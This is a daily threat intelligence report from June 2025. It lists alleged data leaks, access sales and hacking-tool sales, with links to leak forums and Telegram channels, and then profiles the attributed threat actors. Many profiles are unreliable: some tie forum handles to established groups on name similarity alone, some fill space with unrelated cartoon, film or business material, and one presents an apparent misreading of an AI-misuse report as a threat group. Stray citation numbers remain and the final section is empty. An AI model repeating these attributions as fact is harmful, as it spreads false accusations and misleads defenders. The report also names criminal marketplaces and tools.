[June-05-2025] Daily Cybersecurity Threat Report

I. Executive Summary

This daily cybersecurity report provides a comprehensive overview of significant breach incidents observed within the last 24 hours, alongside an in-depth analysis of the threat actors involved and broader trends shaping the cyber landscape. The report highlights the persistent and evolving nature of cyber threats, from financially motivated ransomware groups and initial access brokers to geopolitically aligned hacktivist collectives and nation-state actors leveraging advanced technologies like Artificial Intelligence (AI). Key observations underscore the increasing sophistication of multi-vector attacks, the weaponization of data exfiltration, and the continued reliance by adversaries on exploiting known vulnerabilities and misusing legitimate tools. Recommendations for enhancing organizational cybersecurity posture are provided, emphasizing proactive defense strategies, robust vulnerability management, and adaptive incident response capabilities.

II. Introduction

The digital domain remains a contested space, with a continuous barrage of cyberattacks targeting organizations across all sectors. Understanding the motivations, tactics, techniques, and procedures (TTPs) of various threat actors is paramount for developing effective defensive strategies. This report synthesizes recent incident data with intelligence on prominent cyber adversaries to offer actionable insights into the current threat environment. It aims to provide a clear picture of the types of attacks being conducted, the entities behind them, and the overarching patterns that emerge from daily cyber activity.

III. Cybersecurity Incidents in the Last 24 Hours

The past 24 hours have seen a range of cyber incidents, reflecting the diverse motivations and capabilities of threat actors operating globally. These incidents span from financially driven ransomware attacks and data exfiltration to politically motivated disruptions and espionage.

• Incident ID: INC001 – Alleged database leak of French Swimming Federation
  The threat actor claims to have leaked data from the French Swimming Federation (Fédération Française de Natation). The compromised dataset reportedly includes 2.9 million records.

• Published URL: https://leakbase.la/threads/2-9m-ffn-fedetation-francaise-natation-by-zekrome-s-o-specter-x-uneytech.39132/
• Screenshots: https://d34iuop8pidsy8.cloudfront.net/52023299-61fd-46ed-ad70-6050f3bd0b1f.png
• Incident ID: INC002 – Alleged access sale of Zoho account
  A threat actor claims to be selling access to a Zoho account belonging to a South African business with reported revenue of under $5 million.

• Published URL: https://forum.exploit.in/topic/260336/?tab=comments#comment-1571588
• Screenshots: https://d34iuop8pidsy8.cloudfront.net/d30c2edd-52d5-4de1-85d0-f540db4eccdd.png
• Incident ID: INC003 – Alleged sale of RDP Checker for Windows
  The threat actor claims to be selling “Checker tickets for RDP (Soft for Windows)”, a lightweight, portable Windows-based utility designed to scan and check RDP credentials. The tool reportedly avoids extra processes, supports Windows x64, allows large target lists, custom ports, and accepts input from masscan.

• Published URL: https://ramp4u.io/threads/sell-rdp-checker-%D1%87%D0%B5%D0%BA%D0%B5%D1%80-rdp-%D0%BF%D0%BE%D0%B4-windows.3169
• Screenshots: https://d34iuop8pidsy8.cloudfront.net/d7618f8d-df83-4d72-9bf7-b0a948f3e609.PNG
• Incident ID: INC004 – Alleged data leak of Rajamangala University of Technology Rattanakosin (RMUTR)
  The group claims to have leaked the database of Rajamangala University of Technology Rattanakosin (RMUTR). File size: 546MB Type :.SQL

• Published URL: https://t.me/we_anon_ndtsec/55
• Screenshots: https://d34iuop8pidsy8.cloudfront.net/81fd7b15-d708-47a7-8bf0-fea156a1cf72.png, https://d34iuop8pidsy8.cloudfront.net/83f22c13-0615-4158-ab32-763a4b48b5f4.png
• Incident ID: INC005 – Alleged data leak of Weguest records
  The threat actor claims to have obtained data from Weguest. The exposed data appears to include sensitive employee information such as overtime records, holiday and sick leave balances, compensation details, field training logs, and time-off summaries.

• Published URL: https://darkforums.st/Thread-Weguest-LEAK-2-5M-lines
• Screenshots: https://d34iuop8pidsy8.cloudfront.net/d5f74955-bb75-4e49-aadd-e6f016a614dd.png
• Incident ID: INC006 – Team 1722 targets the website of Amma’s Tasty & Healthy Food
  The group claims to have defaced the website of Amma’s Tasty & Healthy Food.

• Published URL: https://t.me/x1722x/2641
• Screenshots: https://d34iuop8pidsy8.cloudfront.net/82f0ef43-61b3-48e4-ba18-598a28f47e14.png
• Incident ID: INC007 – Alleged data leak of Blitzpools
  The threat actor claims to have leaked data from Blitzpools.

• Published URL: https://leakbase.la/threads/india-gambling-database-blitzpools-com.39127/
• Screenshots: https://d34iuop8pidsy8.cloudfront.net/49364893-c83d-41fa-b533-e9afb3c1faf4.png
• Incident ID: INC008 – Alleged leak of Police Department of Fulton
  A threat actor claims to have leaked internal data from the Fulton Police Department. The exposed data appears to include sensitive employee information such as overtime records, holiday and sick leave balances, compensation details, field training logs, and time-off summaries.

• Published URL: https://darkforums.st/Thread-FULTON-POLICE-DEPARTEMENT-DATA
• Screenshots: https://d34iuop8pidsy8.cloudfront.net/a5543747-f3ff-4eae-be2c-891075698fd3.png
• Incident ID: INC009 – Alleged Breach of Indonesian Delivery Records
  The threat actor claims to have obtained a database containing the personal and logistical details of 30 million Indonesian clients linked to a domestic express delivery company. The leaked dataset reportedly includes sensitive information such as tracking details, phone numbers, national ID numbers, delivery addresses, order statuses, timestamps, and shipment metadata.

• Published URL: https://darkforums.st/Thread-Selling-Indonesia-30-million-Domestic-Express-delivery-company-clients
• Screenshots: https://d34iuop8pidsy8.cloudfront.net/1501d043-7696-411f-84ee-c6121cc54da3.png
• Incident ID: INC010 – NDT SEC claims to target Thailand
  A recent post by the group claims that they are targeting Thailand.

• Published URL: https://t.me/we_anon_ndtsec/51
• Screenshots: https://d34iuop8pidsy8.cloudfront.net/e70ad0c3-f227-48d5-97af-f4c3a7e6a947.png
• Incident ID: INC011 – Alleged Unathorized access to Valmont Solar
  The group claims to have gained unauthorized access to the Valmont Solar.

• Published URL: https://t.me/c/2503473563/244
• Screenshots: https://d34iuop8pidsy8.cloudfront.net/49dbf99e-13ea-4cde-93ee-2776e7fc6f77.png, https://d34iuop8pidsy8.cloudfront.net/368d9eb6-431d-4ff2-9cf2-63f16162558e.png
• Incident ID: INC012 – Alleged sale of Multichecker tool combining seed and Telegram data checking
  A threat actor offers a software called “Multichecker,” an all-in-one GUI tool that integrates Seed Checker, Seed Searcher, and Telegram Checker functionalities. The tool supports over 30 blockchain networks for deep seed phrase and private key searches, including BTC, LTC, DOGE, DASH, BCH, Ethereum, Solana, Tron, and more. It also inspects Telegram tdata sessions to extract crypto balances, channels, admin rights, and searches for mnemonics and private keys within chats, saved messages, and files. Features include multithreading, proxy support, multi-language BIP39 mnemonic compatibility, and notifications via Telegram.

• Published URL: https://xss.is/threads/139167/
• Screenshots: https://d34iuop8pidsy8.cloudfront.net/2a14fc69-f3ad-4cf4-8f87-b89eecf541ac.png, https://d34iuop8pidsy8.cloudfront.net/516623a4-2636-44a0-98fc-2f0273f14329.png
• Incident ID: INC013 – Alleged database sale of Slate & Tell
  The threat actor claims to be selling a database from Slate & Tell. The leaked data, reportedly from June 2025, allegedly includes approximately 5 million customer records compromised from the company’s server.

• Published URL: https://darkforums.st/Thread-Selling-Shopslateandtell-com-Jewelry-Shop-5M-Database-2025
• Screenshots: https://d34iuop8pidsy8.cloudfront.net/53ee9e86-f843-43fb-b337-b233745ef658.png
• Incident ID: INC014 – Alleged Credential Data Leak of Pemprov DKI Jakarta Accounts
  A threat actor known as VirXploit24 has allegedly leaked a large set of stolen login credentials from Pemprov DKI Jakarta. The leaked data includes usernames, passwords, and occasionally nicknames.

• Published URL: https://darkforums.st/Thread-STEALER-LOGS-PEMPROV-DKI-JAKARTA
• Screenshots: https://d34iuop8pidsy8.cloudfront.net/7300bfeb-7c1e-4e8f-b095-6a686bdea35c.png
• Incident ID: INC015 – Alleged data breach of Bangkok Airways
  The group claims to have leaked over 4GB of database dumps and login credentials of more than 30,000 Bangkok Airways customers, including 5GB of SQL data and complete captured login information.

• Published URL: https://t.me/we_anon_ndtsec/47?single
• Screenshots: https://d34iuop8pidsy8.cloudfront.net/de881a05-3f65-436f-ac6a-1881b3c5bdd3.png
• Incident ID: INC016 – Alleged Credential Data Leak of Bank Syariah Indonesia (BSI) Accounts
  A threat actor has allegedly leaked a large set of stolen login credentials form Bank Syariah Indonesia (BSI). The leaked data includes usernames, passwords, and occasionally nicknames or phone numbers associated with account.

• Published URL: https://darkforums.st/Thread-STEALER-LOGS-BANK-BSI-SYARIAH-INDONESIA
• Screenshots: https://d34iuop8pidsy8.cloudfront.net/cce71aca-5fe6-46e4-8569-5c7fdf8136fd.png
• Incident ID: INC017 – Alleged Leak of Personally Identifiable Information of Indonesian Citizens
  A threat actor has allegedly leaked a dataset containing detailed personal information of Indonesian citizens. The leaked data includes full names, email addresses, phone numbers, physical addresses, birthdates, and encrypted passwords.

• Published URL: https://darkforums.st/Thread-BHINEKA-TUNGGAL-IKA-INDONESIA
• Screenshots: https://d34iuop8pidsy8.cloudfront.net/a14f227c-2e29-4540-8bb4-f9e506764157.png
• Incident ID: INC018 – Alleged Sale of 880 Million Passwords
  A threat actor is allegedly selling a database containing 880 million unique, non-duplicate passwords reportedly sourced from personal accounts. The dataset is 9GB in uncompressed size and available for $20.

• Published URL: https://bhf.pro/threads/708473/
• Screenshots: https://d34iuop8p8idsy8.cloudfront.net/6148af6e-69b6-475f-a1a1-b207da78a533.png
• Incident ID: INC019 – Alleged Sale of High Balance Non-VBV Cards from Worldwide Sources
  The threat actor claims to be selling the best quality non-VBV cards (without 2FA) from all countries, each guaranteed to have a balance.

• Published URL: https://leakbase.la/threads/high-balance-nonvbv-c4rds-from-all-countries-available-contact-on-telegram-kynw1337.39113/
• Screenshots: https://d34iuop8pidsy8.cloudfront.net/df8dfcad-d3be-4a2d-9d7c-d5593a1ce295.png
• Incident ID: INC020 – Alleged Sale of Brute-Force Toolkit Targeting VPNs: Cisco, RDWeb, and GP
  Threat actor claims to sell a VPN brute-force toolkit targeting Cisco, RDWeb, and GP. The tool, called VPNStrike, features subdomain scanning and login checking, designed to identify valid portals.

• Published URL: https://ramp4u.io/threads/vpnstrike-%D0%91%D1%80%D1%83%D1%82-cisco-rdweb-gp-%E2%80%94-%D0%A1%D0%BA%D0%B0%D0%BD-%D1%81%D0%B0%D0%B1%D0%B4%D0%BE%D0%BC%D0%B5%D0%BD%D0%BE%D0%B2-%D0%9B%D0%BE%D0%B3%D0%B8%D0%BD-%D1%87%D0%B5%D0%BA%D0%B5%D1%80-vpn-brute-cisco-rdweb-gp-%E2%80%94-subdomain-scan-login-checker.3167/
• Screenshots: https://d34iuop8pidsy8.cloudfront.net/3b3bf70b-bf56-4a2f-af3d-960d625363fa.png
• Incident ID: INC021 – GhostSec targets North Macedonia’s critical infrastructure and Kabelnet Group network systems
  The threat actor claims responsibility for a cyberattack targeting critical infrastructure in North Macedonia. The attackers allegedly disrupted a main Cisco router, disabled over seven Modbus-based industrial devices, and took down a digital repeater (Z35USR) reportedly used for civil and military communications. Connection logs indicate repeated attempts to access TCP port 502 (Modbus), suggesting an ICS/SCADA-focused operation. Threat actor also hints at database breaches, implying potential data leaks in future disclosures.

• Published URL: https://t.me/Ghostsecm/531
• Screenshots: https://d34iuop8pidsy8.cloudfront.net/d01c3c0a-9acd-4f5b-9fcc-2d5ef4d897f7.png, https://d34iuop8pidsy8.cloudfront.net/b604017d-2aa4-45aa-9db4-b43abf00b86d.png
• Incident ID: INC022 – Alleged Leak of Vulnerability on the Website of Jabatan Kemajuan Islam Malaysia (JAKIM)
  The threat actor claims to have discovered and exploited a critical SQL injection vulnerability on the official website of Jabatan Kemajuan Islam Malaysia (JAKIM). The flaw allegedly allowed unauthenticated access to the admin dashboard, exposing thousands of halal certification records, user data, and official documents. The actor reports the absence of basic security measures like CAPTCHA, WAF, and encryption, with the vulnerability potentially active for years without detection.

• Published URL: https://darkforums.st/Thread-MIHAB-Malaysia-International-Halal-Authority-Board
• Screenshots: https://d34iuop8pidsy8.cloudfront.net/7d611ddd-65c4-4f68-b466-be96f78caf2d.png
• Incident ID: INC023 – Alleged Data Leak of Ecuadorian Citizens
  A threat actor claims to have leaked a database containing information on Ecuadorian citizens. The dataset includes approximately 433,000 records and spans breaches that occurred between 2024 and 2025.

• Published URL: https://breach-forums.st/Thread-CSV-Ecuador-Full-Data-Base
• Screenshots: https://d34iuop8pidsy8.cloudfront.net/57d53a95-493d-4365-a4a7-1de3657bc808.png

IV. Threat Actor Profiles

Understanding the adversaries is fundamental to effective cybersecurity. This section details the known characteristics, motivations, and TTPs of the threat actors identified in the recent incidents.

A. Financially Motivated Cybercriminals

Financially motivated groups continue to be a dominant force in the cyber threat landscape, driven by monetary gain through various illicit activities.

• Person57
  Person57 refers to a collective of over 57 distinct threat actors with ties to China, Iran, North Korea, and Russia.1 These groups have been observed using Artificial Intelligence (AI) technology, specifically powered by Google’s Gemini, to enhance their malicious cyber and information operations.1 While they are still experimenting with AI for productivity gains rather than developing novel capabilities, their use cases include research, troubleshooting code, and creating/localizing content.1
  Government-backed attackers, also known as Advanced Persistent Threat (APT) groups, leverage AI tools to bolster multiple phases of the attack cycle.1 This includes coding and scripting tasks, payload development, gathering information about potential targets, researching publicly known vulnerabilities, and crafting phishing campaigns.1 Iranian APT actors are noted as the “heaviest users of Gemini,” with APT42 specifically using AI for phishing campaigns, reconnaissance on defense experts, and content generation.1 Chinese APT groups use AI for reconnaissance, code troubleshooting, and methods to burrow deep into victim networks through techniques like lateral movement, privilege escalation, data exfiltration, and detection evasion.1
• Associated Incidents (from this report):
• Incident ID: INC001 – Alleged database leak of French Swimming Federation: The alleged database leak from the French Swimming Federation, attributed to “Person57,” aligns with the broader activities of this collective, which includes data exfiltration and operations by various threat actors.
• betway (aka ToyMaker, UNC961, Gold Melody, Prophet Spider)
  ToyMaker is an initial access broker (IAB) assessed with medium confidence to be financially motivated.2 This group specializes in acquiring access to high-value organizations and then transferring that access to secondary threat actors, typically double extortion ransomware gangs like CACTUS.2 ToyMaker scans for vulnerable systems and deploys a custom malware called LAGTOY (also known as HOLERUN).2 The malware was first documented by Google-owned Mandiant in late March 2023, attributing its use to UNC961.2 The group leverages a large arsenal of known security flaws in internet-facing applications to obtain initial access.2 Following initial access, they conduct reconnaissance, harvest credentials, and deploy LAGTOY, often within a week.2
• Associated Incidents (from this report):
• Incident ID: INC002 – Alleged access sale of Zoho account: The claim of selling access to a Zoho account belonging to a South African business, attributed to “betway,” is consistent with ToyMaker’s modus operandi as an Initial Access Broker (IAB) focused on financially motivated access sales.
• Avoid
  The research material provides no specific information about a threat actor named “Avoid.” The term “threat actor” is a general cybersecurity term referring to any individual, group, or entity that poses a risk to digital systems, infrastructure, or data, whether maliciously, opportunistically, or unintentionally.3 Financially motivated threat actors seek monetary gain through ransomware, credit card fraud, identity theft, and business email compromise.3 Without further context, “Avoid” does not correspond to a known, named cybercriminal group in the provided data.
• Associated Incidents (from this report):
• Incident ID: INC003 – Alleged sale of RDP Checker for Windows: The alleged sale of an RDP Checker for Windows, attributed to “Avoid,” suggests an individual or group involved in providing tools for initial access, aligning with the broader category of financially motivated cybercriminals or opportunistic actors.
• Gumball
  The name “Gumball” in the context of threat actors does not appear to refer to a specific, recognized hacking group or cybercriminal entity in the provided research material.5 Instead, the term is associated with a cartoon character and an actor who voiced characters in “Gumball” and “TMNT,” who was involved in a controversial personal incident.5 There are also references to “Gumball” as a host-read ad marketplace in the podcast industry.6 In a metaphorical sense, “hacking” in the context of “The Amazing World of Gumball” refers to humorous, non-malicious scenarios within the cartoon where characters “hack the internet” using concepts like Trojans, firewalls, and worms.7 This suggests that “Gumball” is not a cyber threat actor in the conventional sense based on the provided information.
• Associated Incidents (from this report):
• Incident ID: INC005 – Alleged data leak of Weguest records: The alleged data leak from Weguest, attributed to “Gumball,” is likely a misattribution or an opportunistic attack by an unknown actor using a whimsical name, given the lack of specific threat intelligence on a “Gumball” hacking group.
• hagilo2748
  The research material does not contain any specific information about a threat actor named “hagilo2748.” Therefore, details regarding their motivations, TTPs, or known activities are unavailable.
• Associated Incidents (from this report):
• Incident ID: INC007 – Alleged data leak of Blitzpools: The alleged data leak from Blitzpools, attributed to “hagilo2748,” suggests an individual or group involved in data exfiltration, likely for financial gain, but specific details about this actor are not provided in the research.
• DigitalGhost (aka Ghost, Cring, Crypt3r, Phantom, Strike, Hello, Wickrme, HsHarada, Rapture)
  The Ghost ransomware group, also tracked as HsHarada or Rapture, emerged as a significant and financially damaging cyber threat.9 Active since early 2021, these actors are located in China and conduct widespread attacks for financial gain.10 They indiscriminately target victims whose internet-facing services run outdated software and firmware versions, affecting organizations in over 70 countries.10 Their victims span critical infrastructure, schools, universities, healthcare, government networks, religious institutions, technology, manufacturing, and numerous small- and medium-sized businesses.10
  Ghost actors gain initial access by exploiting publicly known vulnerabilities in internet-facing systems, specifically targeting unpatched security gaps in enterprise technologies like Fortinet, Microsoft Exchange (ProxyShell), Adobe ColdFusion, and Microsoft SharePoint.9 Once inside a network, they move rapidly, often deploying ransomware within hours of initial access.9 Their post-compromise tactics include deploying web shells for persistence, abusing PowerShell for command execution and lateral movement, and using Cobalt Strike for post-exploitation activities and privilege escalation.9 They also change credentials to lock out administrators and solidify control.9
  Ghost follows a standard extortion model: encrypting critical files, demanding ransom, and pressuring victims.9 While they claim data exfiltration, it is not always clear if significant amounts are stolen or if the threat of exposure is primarily leverage.9 Unlike some groups with dedicated leak sites, Ghost may publish stolen data on platforms like BreachForums or other underground forums.9 They use ransomware executables like Cring.exe, Ghost.exe, ElysiumO.exe, and Locker.exe, which can encrypt specific directories or entire storage, excluding certain files to prevent rendering devices inoperable.10 Ransoms typically range from tens to hundreds of thousands of dollars in cryptocurrency.10
• Associated Incidents (from this report):

• Incident ID: INC008 – Alleged leak of Police Department of Fulton: The alleged leak of internal data from the Fulton Police Department, attributed to “DigitalGhost,” aligns with this group’s known activities of targeting various sectors, including government networks, for data exfiltration and financial gain.
• Incident ID: INC017 – Alleged Leak of Personally Identifiable Information of Indonesian Citizens: The alleged leak of personally identifiable information of Indonesian citizens, attributed to “DigitalGhost,” is consistent with this group’s broader operations involving data theft for financial gain.
• giorggios
  The name “Giorggios” (or “Giorgia”) in the context of threat actors is not associated with a specific, recognized hacking group or cybercriminal entity in the provided research material.11 Instead, it appears in discussions related to business case studies, specifically concerning “Giorggio Maggiali” and Barilla Spa’s Just-In-Time Distribution (JITD) program.11 However, a related search result mentions the hacker group “NoName057” claiming responsibility for an attack on Italian ministries, stating it was in response to a meeting between Italian Prime Minister Giorgia Meloni and Ukrainian President Volodymyr Zelenskyy.13 This indicates that while “Giorggios” is not a threat actor, political figures with similar names can become indirect targets or catalysts for cyberattacks by established hacktivist groups.
• Associated Incidents (from this report):
• Incident ID: INC009 – Alleged Breach of Indonesian Delivery Records: The alleged breach of Indonesian delivery records, attributed to “giorggios,” suggests an individual or group involved in data theft, likely for financial gain, but specific threat intelligence on an actor named “giorggios” is not provided.
• schabb0
  The name “Schabb0” is associated with a highly sophisticated obfuscating compiler called “ScatterBrain”.15 ScatterBrain is described as a substantial evolution of ScatterBee, previously analyzed by PWC, and is used in operations against various entities across Europe and the Asia Pacific (APAC) region.15 The complexity of ScatterBrain, compounded by the attackers’ highly sophisticated threat tactics, makes analysis exceptionally challenging.15 It integrates multiple operational modes and protection components to significantly complicate the analysis of generated binaries, designed to render modern binary analysis frameworks and defender tools ineffective.15 Its protection mechanisms include selective or full Control Flow Graph (CFG) obfuscation, instruction mutations, and complete import protection.15 The full Portable Executable (PE) header of the protected binary is removed, a custom loading logic is introduced, and metadata is protected via hash-like integrity checks.15 This indicates “Schabb0” is likely a developer or a key figure behind this advanced obfuscation technology, rather than a group name.
• Associated Incidents (from this report):
• Incident ID: INC012 – Alleged sale of Multichecker tool combining seed and Telegram data checking: The alleged sale of a “Multichecker” tool, attributed to “schabb0,” aligns with the profile of an individual or entity involved in developing and distributing sophisticated malicious software, similar to the advanced obfuscation technology associated with “Schabb0.”
• BlackH0le (aka BlackLock, El Dorado Ransomware, DragonForce)
  BlackLock is a ransomware group that has recently faced significant setbacks due to security researchers exploiting a vulnerability in their dark web site.16 This compromise allowed researchers to inspect BlackLock’s network infrastructure, activity logs, hosting providers, and linked MEGA accounts used for storing victim data.16 This exposure provided critical intelligence, enabling the prediction and prevention of some planned attacks and the protection of undisclosed victims.16
  Researchers identified 46 victims across various sectors, including electronics, academia, religious organizations, defense, healthcare, technology, IT/MSP vendors, and government agencies, located in numerous countries.16 BlackLock is considered a new iteration of the El Dorado Ransomware group, and there are noted links to the rival ransomware group DragonForce, with suggestions of a possible hijacking of BlackLock’s dark website, indicating potential cooperation or a hostile takeover.16 The group used the file-sharing service MEGA to store and transfer stolen data.16 The vulnerability exploited was a misconfiguration in BlackLock’s website, allowing access to clearnet IP addresses and, through a Local File Include (LFI) vulnerability, access to config files and credentials.16 The acquired command history revealed copy-pasted credentials and a detailed chronology of victim data publication, signifying a major operational security failure.16
• Associated Incidents (from this report):
• Incident ID: INC013 – Alleged database sale of Slate & Tell: The alleged database sale from Slate & Tell, attributed to “BlackH0le,” is consistent with the activities of the BlackLock ransomware group, which is known for data exfiltration and selling compromised information.
• VirXploit24
  The research material provides limited specific details about the VirXploit24 hacking group itself. However, it mentions a “Weekly Intelligence Report – 16 May 2025” that identifies “Brain Cipher Ransomware” as a new threat first identified in June 2024.17 Brain Cipher ransomware uses strong AES-256 encryption combined with RSA-2048 to secure encryption keys, making file recovery without the key nearly impossible.17 The report also highlights a critical vulnerability (CVE-2025-22462) with a CVSS Base Score of 9.8, allowing remote attackers to bypass authentication processes, often targeting server applications and remote management servers (RDP, SSH).17 This vulnerability is a common vector for initial access for various ransomware operations.
• Associated Incidents (from this report):

• Incident ID: INC014 – Alleged Credential Data Leak of Pemprov DKI Jakarta Accounts: The alleged credential data leak from Pemprov DKI Jakarta accounts, attributed to “VirXploit24,” aligns with the broader context of data theft and ransomware operations, which often involve exploiting vulnerabilities to gain access to sensitive information.
• Incident ID: INC016 – Alleged Credential Data Leak of Bank Syariah Indonesia (BSI) Accounts: The alleged credential data leak from Bank Syariah Indonesia (BSI) accounts, attributed to “VirXploit24,” is consistent with the group’s involvement in data theft and financially motivated cybercrime.
• Montanavip
  The research material does not contain any specific information about a threat actor named “Montanavip.” Therefore, details regarding their motivations, TTPs, or known activities are unavailable.
• Associated Incidents (from this report):
• Incident ID: INC018 – Alleged Sale of 880 Million Passwords: The alleged sale of 880 million passwords, attributed to “Montanavip,” suggests an individual or group involved in large-scale data brokering, likely for financial gain, but specific details about this actor are not provided in the research.
• wndyn1337
  The research material does not contain any specific information about a threat actor named “wndyn1337.” Therefore, details regarding their motivations, TTPs, or known activities are unavailable.
• Associated Incidents (from this report):
• Incident ID: INC019 – Alleged Sale of High Balance Non-VBV Cards from Worldwide Sources: The alleged sale of high-balance non-VBV cards, attributed to “wndyn1337,” indicates an individual or group involved in credit card fraud and illicit financial activities, but specific details about this actor are not provided in the research.
• sexypinky
  The name “Sexypinky” does not appear to refer to a recognized cyber threat actor or hacking group in the provided research material.18 Instead, it is primarily associated with the Japanese “pinky violence” film genre, specifically the actress Reiko Ike and the film “Female Yakuza Tale – Inquisition and Torture”.19 The term also appears in a list of common passwords or usernames from a password cracking dictionary (rockyou.txt), indicating it is a string found in publicly available datasets, not a group designation.18 There is no information linking “Sexypinky” to any cybercrime or hacking activities.
• Associated Incidents (from this report):
• Incident ID: INC020 – Alleged Sale of Brute-Force Toolkit Targeting VPNs: Cisco, RDWeb, and GP: The alleged sale of a brute-force toolkit targeting VPNs, attributed to “sexypinky,” is likely a misattribution or an arbitrary label, given the lack of specific threat intelligence on such an actor.

B. Hacktivist Groups

Hacktivist groups, driven by ideological, social, or political agendas, employ cyber means to achieve their objectives, often causing disruption and reputational damage.

• NDT SEC
  NDTsec is a Cambodian hacktivist group that has been observed attacking Thailand’s infrastructure.23 Their activities are often driven by geopolitical tensions and cultural grievances, such as disputes over territorial claims or cultural mimicry.23 NDTsec, along with groups like “Anonymous Cambodia” and “riSofly,” targets various Thai entities, including banks, airports, and the Royal Thai Navy.23 Their tactics include data leaks and launching Distributed Denial of Service (DDoS) attacks on websites, causing server disruptions.23 They have also conducted similar cyberattacks in other countries like Indonesia, Malaysia, and India, often seizing on contentious issues as a pretext for their attacks.25 These groups often target government institutions and corporations to make political statements.24
• Associated Incidents (from this report):

• Incident ID: INC004 – Alleged data leak of Rajamangala University of Technology Rattanakosin (RMUTR): The alleged data leak from Rajamangala University of Technology Rattanakosin (RMUTR), attributed to “NDT SEC,” aligns with this group’s known tactics of data leaks against various entities, including educational institutions, often for political or cultural reasons.
• Incident ID: INC010 – NDT SEC claims to target Thailand: The claim by “NDT SEC” to be targeting Thailand is consistent with their documented activities and motivations as a Cambodian hacktivist group focusing on Thai infrastructure due to geopolitical and cultural grievances.
• Incident ID: INC015 – Alleged data breach of Bangkok Airways: The alleged data breach of Bangkok Airways, attributed to “NDT SEC,” is consistent with this group’s known activities of targeting Thai entities, including transportation and financial sectors, for data leaks and disruptions.
• Team 1722
  Team 1722 is identified as one of the most active hacktivist groups in the first quarter of 2025.26 They are mentioned alongside other pro-Russian hacktivists like NoName057(16), Hacktivist Sandworm, Z-pentest, Sector 16, and Overflame, who primarily target NATO-aligned nations and Ukraine supporters.27 While the research material confirms their consistent activity, specific details regarding their origin, precise TTPs, or detailed targets beyond general alignment with pro-Ukrainian, pro-Palestinian, and anti-establishment hacktivists are not extensively provided.27 Their activity contributes to the observed surge in hacktivist attacks on Industrial Control Systems (ICS) and Operational Technology (OT), which increased by 50% in March, as pro-Russian actors increasingly exploit internet-facing ICS/OT for wider political and economic impact.27
• Associated Incidents (from this report):
• Incident ID: INC006 – Team 1722 targets the website of Amma’s Tasty & Healthy Food: The defacement of Amma’s Tasty & Healthy Food website, attributed to “Team 1722,” aligns with the general tactics of hacktivist groups, which often include website defacement to make a statement or showcase capabilities.
• GhostSec (aka GhostSecMafia, GSM)
  GhostSec is a highly organized hacktivist group with historical ties to the “Anonymous” collective.28 Emerging in 2015, their initial focus was on countering online terrorism and violent extremism, specifically targeting groups like ISIS and Al-Qaeda through DDoS attacks, system intrusion, webpage defacement, and data leaks.28
  A significant shift occurred in late July 2022, when GhostSec announced the launch of “GhostSec Mafia Premium,” a subscription-based Telegram channel, explicitly stating, “Hacktivism does not pay the bills!”.28 This marked their transition to a financially motivated cyber mafia organization, engaging in cybercriminal activities, including selling initial access and developing modular ransomware like GhostLocker (a Ransomware-as-a-Service, RaaS).29 They collaborated with Stormous, another group from “The Five Families” hacker collective, on double extortion ransomware attacks across various business sectors and countries.29
  However, GhostSec recently announced a shift back from financially motivated cybercrime to hacktivism, planning to cease all cybercrime services and transfer clients to Stormous.29 They aim to return to social and political activism, maintaining private channels and potentially launching a hacking course.29 This group demonstrates a fluid motivation, adapting between ideological and financial objectives.29
• Associated Incidents (from this report):
• Incident ID: INC021 – GhostSec targets North Macedonia’s critical infrastructure and Kabelnet Group network systems: The cyberattack targeting critical infrastructure in North Macedonia, attributed to “GhostSec,” aligns with the group’s historical and recent focus on hacktivism, including disruptive attacks against government and public sector entities.
• Z-PENTEST ALLIANCE
  The Z-PENTEST ALLIANCE first appeared in October 2023, with probable origins in Serbia but maintaining close ties to pro-Russian actors.18 Their geopolitical motivation is to weaken industrial and control systems (ICS/SCADA) in Western countries, thereby strengthening Russia’s geopolitical influence by exploiting technological vulnerabilities.18 They also aim to weaken Western solidarity and create divisions within NATO.18
  Z-Pentest primarily targets critical infrastructure, specifically the energy (oil and gas) and water sectors, aiming to manipulate critical functions such as water pumping, gas, and oil distribution management.18 Targeted countries include the United States, Canada, Australia, France, South Korea, Taiwan, Italy, Romania, Germany, and Poland.18
  Their techniques include penetrating operational control systems (OT), exploiting ICS/SCADA systems, and utilizing zero-day vulnerabilities, often obtained from the dark web or through collaboration.18 They employ social engineering, use information from data leaks for targeted attacks, and operate in a decentralized, anonymous manner.18 The group coordinates attacks on Telegram and private forums, using platforms like X (Twitter) for propaganda.18 They develop specialized tools for OT system penetration and engage in the sale of access to industrial systems and zero-day vulnerabilities on the dark web.18 Z-Pentest also releases videos showcasing OT system manipulations to instill fear and influence victims.18 They often collaborate with groups like SECTOR16, OverFlame, and People’s Cyber Army (PCA), as well as other pro-Palestine, pro-Russian, and anti-establishment hacktivist groups.18
• Associated Incidents (from this report):
• Incident ID: INC011 – Alleged Unathorized access to Valmont Solar: The alleged unauthorized access to Valmont Solar, attributed to “Z-PENTEST ALLIANCE,” aligns with this group’s primary targets in the energy sector and their motivation to weaken industrial systems.
• Vaquill4 (aka Guacamaya, alina, weichafe)
  “Vaquill4” is an alias for the Guacamaya hacktivist group.30 Guacamaya is an international group of hackers primarily focused on Central and Latin America.31 They are motivated by anti-imperialism and environmentalism, fighting against transnational corporations and external intervention in Latin America, particularly extractivism and the armed forces.31 The group has published anonymous reports and leaked sensitive files in the public interest through Distributed Denial of Secrets or directly via links on the Enlace Hacktivista platform.31 They have successfully hacked major corporations and governments in Chile, Colombia, El Salvador, Guatemala, Mexico, and Peru.31 Their TTPs include infiltrating mining and oil companies, police, and Latin American regulatory agencies.23 They release large volumes of data, with one recent dump involving approximately 10 terabytes of emails and other materials from military and police agencies.23
• Associated Incidents (from this report):
• Incident ID: INC023 – Alleged Data Leak of Ecuadorian Citizens: The alleged data leak of Ecuadorian citizens, attributed to “Vaquill4,” directly reflects the documented activities and motivations of the Guacamaya hacktivist group, which focuses on data exfiltration from governmental and corporate entities in Latin America.

C. Nation-State and Espionage Actors

Nation-state actors, often highly resourced and sophisticated, engage in cyber activities for espionage, data theft, and network disruption or destruction, typically for strategic advantage.

